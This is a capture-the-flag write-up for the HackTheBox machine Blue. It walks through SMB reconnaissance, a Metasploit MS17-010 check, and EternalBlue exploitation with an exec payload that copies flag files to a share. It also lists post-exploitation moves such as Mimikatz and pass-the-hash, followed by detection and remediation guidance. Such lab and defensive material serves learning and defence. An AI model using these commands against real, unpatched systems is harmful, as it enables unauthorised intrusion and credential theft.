Overview
Blue is one of the most straightforward machines on HackTheBox: a Windows 7 Professional SP1 host with SMB exposed and no patches applied. The name is a direct reference to EternalBlue (MS17-010), the NSA-developed SMBv1 exploit leaked by the Shadow Brokers in April 2017. The exploit provides kernel-mode code execution, which means immediate SYSTEM access with no privilege escalation step.
What makes Blue instructive isn’t the exploitation itself. It’s the technique used to extract data from a blind execution context. Rather than fighting with interactive shell stability, the approach here writes flag contents to a writable SMB share, then reads them via anonymous access. This pattern applies broadly: any time you have blind command execution and a writable output channel, skip the shell entirely.
Reconnaissance
I start with a service-version scan to map the attack surface:
nmap -sC -sV -oA scans/blue 10.129.13.90| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 135 | MSRPC | Microsoft Windows RPC | Standard Windows service |
| 139 | NetBIOS-SSN | Microsoft Windows netbios-ssn | SMB over NetBIOS |
| 445 | SMB | Microsoft Windows 7 - 10 microsoft-ds | Workgroup: WORKGROUP |
| 49154 | MSRPC | Microsoft Windows RPC | Dynamic RPC endpoint |
| 49155 | MSRPC | Microsoft Windows RPC | Dynamic RPC endpoint |
| 49156 | MSRPC | Microsoft Windows RPC | Dynamic RPC endpoint |
| 49157 | MSRPC | Microsoft Windows RPC | Dynamic RPC endpoint |
The host identifies as HARIS-PC. SMB signing is disabled and guest
authentication is enabled. TTL 127 confirms Windows. The attack surface is
SMB-only; no web server, no SSH, no RDP.
Attack Surface Analysis
SMB enumeration
Anonymous access reveals two non-default shares:
smbclient -N -L //10.129.13.90Share Disk
Users DiskShare is empty and writable from SYSTEM context (not from anonymous). Users
maps to C:\Users but only exposes Default and Public profiles. No user
home directories are accessible anonymously.
MS17-010 vulnerability check
Windows 7 Professional SP1 x64 with SMB signing disabled is the canonical EternalBlue target profile. I confirm with the Metasploit auxiliary scanner:
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.129.13.90
run[+] 10.129.13.90:445 - Host is likely VULNERABLE to MS17-010!
Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)| Attribute | Value |
|---|---|
| CVE | CVE-2017-0144 |
| CVSS v3 | 8.1 (High) |
| CWE | CWE-119 (Improper Restriction of Operations within Memory) |
| Root cause | SMBv1 pool overflow in srv.sys kernel driver |
| Affected | Windows Vista through Windows Server 2008 R2 (unpatched) |
| Fixed in | MS17-010 (KB4013389) |
| MITRE ATT&CK | T1210 (Exploitation of Remote Services) |
Vulnerability Analysis
EternalBlue exploits a buffer overflow in the Windows SMBv1 driver (srv.sys).
The vulnerability lies in how the SMB server handles transaction requests. A
specially crafted SMBv1 message causes a pool overflow in kernel memory,
allowing the attacker to overwrite adjacent pool allocations and gain arbitrary
code execution in ring 0.
The exploit is significant for several reasons. It executes in kernel mode,
meaning the attacker immediately operates as NT AUTHORITY\SYSTEM. No user
credentials are required. No prior authentication is needed. The only
prerequisite is network access to port 445.
The Shadow Brokers leak in April 2017 released a weaponised version of this exploit. Within weeks, WannaCry and NotPetya used it for global propagation. Microsoft had released the patch (MS17-010) a month before the leak, but unpatched systems remained widespread.
Exploitation
I use the exec payload rather than a reverse shell. The technique writes
flag contents to the writable Share directory, avoiding interactive session
management entirely:
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.129.13.90
set LHOST tun0
set PAYLOAD windows/x64/exec
set CMD cmd /c "type C:\Users\haris\Desktop\user.txt > C:\Share\u.txt & type C:\Users\Administrator\Desktop\root.txt > C:\Share\r.txt"
run[*] 10.129.13.90:445 - Connecting to target for exploitation.
[+] 10.129.13.90:445 - Connection established for exploitation.
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.13.90:445 - Sending egg to corrupted connection.
[*] 10.129.13.90:445 - Triggering free of corrupted buffer.The exec payload runs as NT AUTHORITY\SYSTEM. Flags are written to
C:\Share\ and retrieved via anonymous SMB:
smbclient -N //10.129.13.90/Share -c "get u.txt; get r.txt"
cat u.txt
# [redacted]
cat r.txt
# [redacted]No privilege escalation required. EternalBlue provides direct SYSTEM access.
Post-Exploitation
With SYSTEM access, I enumerate the system to understand the full exposure:
# Via a Meterpreter session for interactive enumeration
whoami
# nt authority\system
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix"
# OS Name: Microsoft Windows 7 Professional
# OS Version: 6.1.7601 Service Pack 1 Build 7601
# Hotfix(s): N/AZero hotfixes installed. Every vulnerability disclosed for Windows 7 SP1 is exploitable on this host.
What a real attacker does next
In a production network, this compromised host becomes a pivot point:
- Credential harvesting: Mimikatz for cleartext passwords and NTLM hashes from LSASS memory
- Lateral movement: Pass-the-hash to other Windows hosts on the same subnet
- Persistence: Create a local admin account, install a service, or deploy a scheduled task
- Domain escalation: If domain-joined, extract cached domain credentials for offline cracking
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1210 | IDS signature for EternalBlue SMBv1 transaction anomalies |
| Execution | T1106 | Kernel-mode shellcode execution from srv.sys pool overflow |
| Exfiltration | T1039 | File writes to shared network drives from SYSTEM context |
Network-level: Snort and Suricata have well-maintained signatures for MS17-010 exploitation attempts. The exploit’s SMBv1 transaction pattern is distinctive and rarely produces false positives. Any modern IDS deployment should detect this.
Host-level: Windows Event Log entries for SMBv1 connections from unusual sources. Sysmon can capture the kernel-mode shellcode execution, though EternalBlue’s kernel-level operation makes host-based detection inherently more difficult than network-based detection.
SMB audit logging: Enable Windows Security Event 5145 (network share access) to detect unusual file writes to shares from SYSTEM context. A SYSTEM process writing to a user-created share is anomalous.
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Apply MS17-010 (KB4013389) | Low | Critical |
| P0 | Disable SMBv1 protocol entirely | Low | Critical |
| P0 | Upgrade from Windows 7 to a supported OS | High | Critical |
| P1 | Enable SMB signing on all hosts | Low | High |
| P1 | Restrict SMB (445) at the perimeter firewall | Low | High |
| P2 | Deploy network IDS with SMBv1 exploit signatures | Medium | Medium |
| P2 | Disable guest authentication on SMB shares | Low | Medium |
The fundamental problem is running Windows 7, which reached end-of-life in January 2020. MS17-010 is one vulnerability among hundreds that will never be patched on this OS. The correct remediation is migration to Windows 10/11 or Windows Server 2019+, not individual patching.
For environments where SMBv1 cannot be disabled immediately (legacy application dependencies), compensating controls include: network segmentation to isolate SMBv1 hosts, mandatory SMB signing, and continuous monitoring with IDS signatures tuned for EternalBlue variants.
Key Takeaways
-
SMBv1 should be disabled everywhere. Microsoft deprecated SMBv1 in 2014 and has recommended disabling it since. EternalBlue is the most dramatic reason, but the protocol has fundamental design weaknesses that no patch can fully address. If a legacy application requires SMBv1, isolate that application on a dedicated network segment with strict access controls.
-
Blind execution with a writable output channel is often better than a shell. The exec payload approach (write output to a share, read via SMB) avoids all the reliability issues of interactive reverse shells: firewall egress rules, NAT traversal, session timeouts, encoding problems. When you have a writable share or a web root, consider whether you need a shell at all.
-
Zero hotfixes is more common than it should be. This machine has no patches installed whatsoever. In production environments, patch management failures are rarely this extreme, but partial patching (applying some updates while missing critical ones) is routine. Vulnerability scanning catches individual CVEs; what it misses is the systemic risk of a host that has fallen entirely out of the patch cycle.